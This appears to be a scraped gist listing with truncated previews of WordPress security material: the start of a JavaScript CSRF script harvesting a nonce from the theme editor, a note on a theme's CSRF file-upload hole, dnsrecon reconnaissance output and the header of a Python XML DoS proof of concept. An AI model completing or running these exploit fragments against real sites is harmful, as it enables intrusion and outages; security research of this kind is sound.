This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
chrome://-alkuisissa | |
chrome://-nettadresser | |
chrome://-webbadresser | |
chrome://ChromeTestChromeWebUIControllerFactory | |
chrome://DummyURL | |
chrome://URLs | |
chrome://about | |
chrome://accessibility | |
chrome://anything | |
chrome://app-list |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var wpnonce = ''; | |
function getCSRFNonce(callback) | |
{ | |
var re = /<input type="hidden" id="_wpnonce" name="_wpnonce" value="(\w*)" \/>/ | |
var xhr = new XMLHttpRequest(); | |
xhr.open("GET", "http://mywordpress.com/wordpress/wordpress-475/wp-admin/theme-editor.php?file=index.php&theme=twentyseventeen", true); | |
xhr.withCredentials = true; | |
xhr.overrideMimeType('text/xml'); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
When you first release software online you don't put too much thought into the software license (I didn't at least). You have no idea if the project will take off. If your intention is for your peers to use it freely your first thought may be Open Source. The most popular Open Source license is the GNU GPL, so why not use that!? | |
I released WPScan on the 16th of June 2011 along with the GNU GPL license. After a while I built up a team, The WPScan Team, which were people who had the same goals as me, to make an awesome black box WordPress scanning tool. The WPScan Team (3 other awesome people) and I have been working on WPScan in our spare time as volunteers for almost 4 years. Countless hours, days, weeks and months of man hours have been put into WPScan and recently the WPScan Vulnerability Database by us. | |
And we don't mind this, we do it because we want our peers to be able to use the software freely. We do it because we want to use the software ourselves. Of course there is no selfless deed, we do it for |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
WPScan Public Source License | |
The WPScan software (henceforth referred to simply as "WPScan") is dual-licensed - Copyright 2011-2015 WPScan Team. | |
Cases that include commercialization of WPScan require a commercial, non-free license. Otherwise, WPScan can be used without charge under the terms set out below. | |
Definitions | |
“License” means this document. | |
“Contributor” means each individual or legal entity that creates, contributes to the creation of, or owns WPScan. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
http://theantisocialengineer.com/wp-admin/admin-ajax.php?action=wordfence_logHuman&hid=AAF49566F17ED862F20934A0501A97C9&r=0.5144356689415872 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Theme Name: Satoshi v2.0 | |
Theme URI: http://www.vooshthemes.com | |
Description: A Free Portfolio Theme Developed By Voosh Themes. Please look at the <a href="../wp-content/themes/satoshi/instructions/instructions.html">instructions</a> that are included with the file you downloaded <a href="../wp-content/themes/satoshi/instructions/instructions.html">(satoshi/instructions/instructions.html)</a> for details about how to configure this theme. | |
Author: Voosh Themes | |
Author URI: http://www.vooshthemes.com | |
wp-content/themes/satoshi/upload-file.php vulnerable to CSRF file upload via ajaxupload.3.5.js | |
Localhost Demo: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
if ( !function_exists('wp_generate_auth_cookie') ) : | |
/** | |
* Generate authentication cookie contents. | |
* | |
* @since 2.5.0 | |
* | |
* @param int $user_id User ID | |
* @param int $expiration Cookie expiration in seconds |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$ ./dnsrecon.py -d jamiehankins.co.uk | |
[*] Performing General Enumeration of Domain: jamiehankins.co.uk | |
[-] DNSSEC is not configured for jamiehankins.co.uk | |
[*] SOA hank.ns.cloudflare.com 173.245.59.116 | |
[*] SOA hank.ns.cloudflare.com 2400:cb00:2049:1::adf5:3b74 | |
[*] NS hank.ns.cloudflare.com 173.245.59.116 | |
[*] NS hank.ns.cloudflare.com 2400:cb00:2049:1::adf5:3b74 | |
[*] NS lucy.ns.cloudflare.com 173.245.58.133 | |
[*] NS lucy.ns.cloudflare.com 2400:cb00:2049:1::adf5:3a85 | |
[*] MX aspmx2.googlemail.com 74.125.143.27 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!DOCTYPE html> | |
<html> | |
<body> | |
<input type="text" name="version1" value="1.0"> | |
<select> | |
<option value="<"><</option> | |
<option value=">">></option> | |
<option value="=">=</option> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
################################################################################# | |
# CVE-XXXXX Wordpress and Drupal XML Blowup Attack DoS# | |
# Author: Nir Goldshlager - Salesforce.com Product Security Team# | |
# This is a Proof of Concept Exploit, Please use responsibly.# | |
################################################################################# | |
#!/usr/bin/env python | |
from __future__ import print_function | |
import threading | |
import time | |
import urllib |